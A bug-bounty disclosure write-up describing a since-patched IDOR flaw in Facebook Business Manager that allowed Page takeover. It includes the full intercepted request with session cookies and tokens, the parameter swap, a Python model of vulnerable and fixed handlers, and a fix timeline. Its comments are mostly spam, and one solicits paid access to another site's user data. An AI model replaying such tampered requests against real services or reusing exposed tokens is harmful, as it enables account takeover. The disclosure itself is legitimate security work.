Facebook Page Takeover

Outline:

This write-up covers an Insecure Direct Object Reference (IDOR) vulnerability in Facebook Business Manager that let an attacker take over any Facebook Page in under 10 seconds.

About Facebook Page:

Pages are for brands, businesses, organisations and public figures to create a presence on Facebook, whereas profiles represent individual people. Anyone with an account can create a Page or help manage one, if they’ve been given a role on the Page like admin or editor. People who like a Page and their friends can get updates in News Feed. With a Facebook Page, you can easily show customers what you’re all about.

Keep new and existing customers engaged by:

  • Listing details – such as opening hours and contact info
  • Adding big, beautiful photos and images
  • Posting updates to let people know the latest about your business

About Facebook Business Manager:

Business Manager lets businesses more securely share and control access to their ad accounts, Pages, and other assets on Facebook. Anyone in a business can see all of the Pages and ad accounts they work on in one place, without sharing login information or being connected to their coworkers on Facebook. When you sign into Business Manager, we’ll show you a quick overview of the ad accounts and Pages that you work on. If you’re the admin for your business, go to Business Settings to add new people, Pages, ad accounts and other assets to your business.

Business Manager is a new, more secure tool for managing access to Pages and ad accounts, geared towards companies who need to give different permissions to lots of people.

Business Manager lets you:

  • Manage access to Pages and ad accounts: Clearly see who has access to your Pages and ad accounts and remove or change their permissions.
  • Keep your work separate: Get access to Pages and ad accounts without being friends with your coworkers on Facebook. Learn more about what your coworkers can see about you.

Vulnerability Description:

Insecure Direct Object References occur when an application takes a user-supplied value (such as a record ID in a parameter) and uses it to look up an object without checking that the requesting user is actually authorized to act on that object. An attacker can then bypass authorization simply by changing the parameter value to point at somebody else's object: database entries belonging to other users, files in the system, or, as in this case, Pages owned by another business.

Reference: Insecure Direct Object References

Reproduction Instructions / Proof of Concept:

Below are the steps that reproduce the vulnerability, which allowed taking over any Facebook Page.

Prerequisites:

1. Two Facebook Business accounts: one is my own business, the other can be any test account's business.

My own business ID: 907970555981524

The partner ID can be any business; I chose the one belonging to my test account: 991079870975788

2. Add a partner from my own business and intercept the request.

The vulnerable request:

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

3. Change asset_id to the ID of the Page to be taken over, and swap the values of parent_business_id and agency_id, i.e.:

parent_business_id=991079870975788
agency_id=907970555981524
asset_id=190313461381022
role=MANAGER

4. Resend the request.

The request succeeds: the Page is added to the attacker's Facebook Business Manager with the role MANAGER.

5. Assign yourself as admin of the Page that was added by the exploit.

6. Open the Page in Facebook Business Manager; every action on it is now possible.
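The missing check behind steps 2 to 4, and the IDOR definition above, shown as an added example that is not Facebook's code: a small Python model of an endpoint like /business_share/asset_to_agency/ with the defective behaviour and a hardened version side by side, each fed the two request bodies from steps 2 and 3. The numeric IDs are the ones quoted in this write-up; the victim business, its admin user and the test-account admin are constructed placeholders, and the allowed role set is assumed to contain only MANAGER, the one role seen here.

```python
# Added example (not Facebook's code): model of an asset-sharing endpoint,
# showing the missing object-level authorization check and the hardened form.
from dataclasses import dataclass, field
from urllib.parse import parse_qs

ALLOWED_ROLES = {"MANAGER"}          # assumed: only the role seen in the write-up

ATTACKER_USER = 100000771680694      # c_user from the captured cookie
ATTACKER_BIZ = 907970555981524       # "my own business" in the write-up
TEST_BIZ = 991079870975788           # partner chosen from the test account
OWN_PAGE = 536195393199075           # page legitimately owned by ATTACKER_BIZ
VICTIM_PAGE = 190313461381022        # page targeted in step 3
TEST_USER = 300000000000001          # constructed: admin of the test account
VICTIM_BIZ = 111111111111111         # constructed: business that owns VICTIM_PAGE
VICTIM_USER = 200000000000002        # constructed: admin of VICTIM_BIZ


class AuthorizationError(Exception):
    """Raised when the hardened handler refuses a request."""


@dataclass
class Business:
    admins: set = field(default_factory=set)       # user ids who administer it
    pages: set = field(default_factory=set)        # page ids it owns
    shared_in: dict = field(default_factory=dict)  # page id -> role granted by a partner


def make_directory():
    """Fresh copy of the constructed business directory for each run."""
    return {
        ATTACKER_BIZ: Business(admins={ATTACKER_USER}, pages={OWN_PAGE}),
        TEST_BIZ: Business(admins={TEST_USER}),
        VICTIM_BIZ: Business(admins={VICTIM_USER}, pages={VICTIM_PAGE}),
    }


def parse_share_request(body):
    """Pull the four fields that matter out of the urlencoded POST body."""
    q = parse_qs(body)
    return {
        "parent_business_id": int(q["parent_business_id"][0]),
        "agency_id": int(q["agency_id"][0]),
        "asset_id": int(q["asset_id"][0]),
        "role": q["role"][0],
    }


def share_asset_vulnerable(directory, user_id, parent_business_id, agency_id, asset_id, role):
    """Mirrors the defect: the session is valid and the ids exist, so the share
    goes through. Nothing ties user_id to parent_business_id, or asset_id to it."""
    if parent_business_id not in directory or agency_id not in directory:
        raise KeyError("unknown business")
    directory[agency_id].shared_in[asset_id] = role
    return True


def share_asset_hardened(directory, user_id, parent_business_id, agency_id, asset_id, role):
    """Authorization is decided from server-side ownership, not from request ids."""
    parent = directory.get(parent_business_id)
    if parent is None or agency_id not in directory:
        raise AuthorizationError("unknown business")
    if user_id not in parent.admins:                 # caller must administer the sharing business
        raise AuthorizationError("caller does not administer parent_business_id")
    if asset_id not in parent.pages:                 # the object-level check the endpoint lacked
        raise AuthorizationError("asset_id is not owned by parent_business_id")
    if role not in ALLOWED_ROLES:
        raise AuthorizationError("unsupported role")
    directory[agency_id].shared_in[asset_id] = role
    return True


# Constructed bodies: the legitimate share from step 2 and the modified one from step 3.
LEGIT_BODY = f"parent_business_id={ATTACKER_BIZ}&agency_id={TEST_BIZ}&asset_id={OWN_PAGE}&role=MANAGER"
ATTACK_BODY = f"parent_business_id={TEST_BIZ}&agency_id={ATTACKER_BIZ}&asset_id={VICTIM_PAGE}&role=MANAGER"


def replay(handler, body):
    """Run one body through a handler as ATTACKER_USER on a fresh directory;
    return (accepted, role the agency now holds on the asset, or None)."""
    directory = make_directory()
    fields = parse_share_request(body)
    try:
        handler(directory, ATTACKER_USER, **fields)
    except AuthorizationError:
        return False, None
    return True, directory[fields["agency_id"]].shared_in.get(fields["asset_id"])


if __name__ == "__main__":
    for name, handler in (("vulnerable", share_asset_vulnerable), ("hardened", share_asset_hardened)):
        print(name, "legit:", replay(handler, LEGIT_BODY), "attack:", replay(handler, ATTACK_BODY))
```

The vulnerable handler accepts both bodies and hands the attacker's business a MANAGER role on the victim Page; the hardened handler still accepts the legitimate share but rejects the modified one at the ownership check, because neither the caller administers the claimed parent business nor does that business own the asset.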

POC Video:

Impact:

Any Facebook Page could be taken over (e.g. the Pages of Bill Gates, Narendra Modi or Barack Obama), and any action could then be performed on it, including critical actions such as deleting the Page.

Timeline:

All timestamps are in India Standard Time. I omitted a few unimportant interactions.

  • 29 August 2016 at 00:08 : Initial report
  • 30 August 2016 at 06:52 : Bug acknowledged by security team member Nancy
  • 30 August 2016 at 12:29 : Security team member Neal Poole informed me that “Issue should be addressed (we’ve taken down the endpoint temporarily and are going to be removing it entirely)”.
  • 6 September 2016 at 21:30 : I replied confirming that the bug was patched.
  • 6 September 2016 at 23:04 : Security team member William informed me that “We have looked into this issue and believe that the vulnerability has been patched. Please follow up with us if you believe that the patch does not resolve this issue.”
  • 6 September 2016 at 23:04 : I replied that the permanent fix patched the bug.
  • 16 September 2016 at 01:24  : Security team member Rusty informed me that “I wanted to reach out and inform you that we have decided to pay you a bounty of 16,000 dollars for this report. A majority of the bounty is for the page takeover capability of your exploit, but while investigating your report we discovered and fixed another issue as well, so the bounty is a little higher because of that. You can expect the standard longer payout message later in the week.”
  • 16 September 2016 at 02:32  : Bounty of $16,000 awarded.


122 thoughts on “Facebook Page Takeover”

  1. Great work. I’m an “old fart” in the industry and I love the curiosity and ingenuity that exists in this industry. You are going to do well in this field. I am very excited about the skills that are coming out of India as well. Many fall for the Indian stereotype and I applaud you for doing your part to squash it. Drinks on me if we ever meet at a con. Congrats on joining the Million Rupee Bug Bounty Club.

  2. Hi, I really did not get what the goal of the bug is?
    The request you intercepted already had the legal business_id, agent and role; you intercepted it under a legal user and just changed these IDs, the same as you’ve done as a legal user does, but not over the Facebook form but over an interceptor. And the whole session is under HTTPS and cookies, which will decrease the chance of intercepting such a request to 0.
    So where is the bug? I am really in details of the bug. Correct me if I am wrong.

  3. I simply want to mention I am all new to blogs and seriously liked your web-site. Probably I’m planning to bookmark your blog . You amazingly come with beneficial well written articles. Appreciate it for revealing your web site.

  4. you are actually a just right webmaster. The web site loading velocity is incredible. It kind of feels that you’re doing any unique trick. Furthermore, The contents are masterwork. you’ve performed a magnificent task on this matter!

  6. I went over this web site and I think you have a lot of good info , saved to favorites (:Please take a look at the web sites we adhere to, such as this a single, because it represents our picks from the web.

  7. Great, I would like your service, how much I would charge for access to confidential information from this website, I would like to access any account or know the IP number for each user.

    web: dragonbound.net

  8. you are in point of fact a just right webmaster. The site loading velocity is amazing. It sort of feels that you are doing any distinctive trick. Furthermore, The contents are masterpiece. you’ve performed a magnificent process in this subject! beeegddegfgb

  9. I have been surfing online more than 3 hours today, yet I never found any interesting article like yours. It is pretty worth enough for me. In my view, if all webmasters and bloggers made good content as you did, the internet will be much more useful than ever before. gkefeaegdeee

  10. Hello there! Nice website you have here. I do not do this very often, but I am just trying to spread the word that if anyone out there is searching for a place to submit your website to mini-search engines, aka, web directories, you can try out my gigantic list at my website. I would appreciate it if you could approve this comment so that I can help other webmasters out there to gain better exposure for their online business. Thank you in advance and I highly appreciate your help! Thanks!!!

  11. Nice read, I just passed this onto a friend who was doing some research on that. And he actually bought me lunch since I found it for him smile Therefore let me rephrase that: Thank you for lunch! “To be 70 years young is sometimes far more cheerful and hopeful than to be 40 years old.” by Oliver Wendell Holmes.

  12. Hey very cool web site!! Man .. Excellent .. Amazing .. I will bookmark your site and take the feeds also…I am happy to find so many useful information here in the post, we need work out more strategies in this regard, thanks for sharing. . . . . .

  13. I will right away grasp your rss as I can’t in finding your email subscription hyperlink or e-newsletter service. Do you’ve any? Please let me recognize so that I may subscribe. Thanks.|

  14. I do believe all the ideas you have offered for your post. They’re very convincing and will certainly work. Nonetheless, the posts are too quick for novices. Could you please extend them a little from subsequent time? Thanks for the post.

  15. Hey there would you mind stating which blog platform you’re using? I’m looking to start my own blog in the near future but I’m having a difficult time making a decision between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your design and style seems different then most blogs and I’m looking for something unique. P.S Apologies for getting off-topic but I had to ask!

  16. I do agree with all the ideas you’ve presented in your post. They’re really convincing and will certainly work. Still, the posts are very short for beginners. Could you please extend them a little from next time? Thanks for the post.

  17. Attractive portion of content. I just stumbled upon your blog and in accession capital to claim that I get actually enjoyed account your weblog posts. Any way I’ll be subscribing for your augment and even I success you get right of entry to consistently quickly.
